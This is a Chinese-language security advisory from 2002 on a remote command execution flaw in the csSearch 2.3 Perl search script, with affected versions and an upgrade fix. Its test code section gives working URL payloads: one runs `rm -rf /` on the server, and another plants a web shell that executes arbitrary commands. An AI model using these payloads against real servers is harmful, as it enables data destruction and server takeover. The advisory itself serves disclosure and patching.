CSSearch远程命令可执行漏洞

发布时间：2002-03-29
更新时间：2002-03-29
严重程度：高
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：4368

受影响系统

CGISCRIPT.NET csSearch 2.3
   - Apache Group Apache 1.3.17
   - Apache Group Apache 1.3.17win32
   - Apache Group Apache 1.3.18
   - Apache Group Apache 1.3.18win32
   - Apache Group Apache 1.3.19
   - Apache Group Apache 1.3.19win32
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
   - Apache Group Apache 1.3.22
   - Apache Group Apache 1.3.22win32
   - Apache Group Apache 1.3.23
   - Apache Group Apache 1.3.23win32
   - Apache Group Apache 1.3.24
   - Apache Group Apache 1.3.24win32

详细描述
csSearch是由PERL编写的搜索脚本，运行在多种系统平台下。

攻击者可而已通过WEB请求提交正确的URL编码PERL CODE在CGI参数中，就可以导致PERL脚本代码以web服务器的权利执行任意脚本。

测试代码
如csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

下面是一段不到300字节的代码，可以导致开一个WEB SHELL：

csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Comm
and+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26
%26print`$in{'cmd'}+2>%261`;exit;};

解决方案
升级程序如下：

CGISCRIPT.NET csSearch 2.3:

CGISCRIPT.NET Upgrade csSearch 2.5
http://www.cgiscript.net/download/download.htm

相关信息
Steve Gustin <stegus1@yahoo.com>.
参考：http://online.securityfocus.com/archive/1/264169

最近严重漏洞

CSSearch远程命令可执行漏洞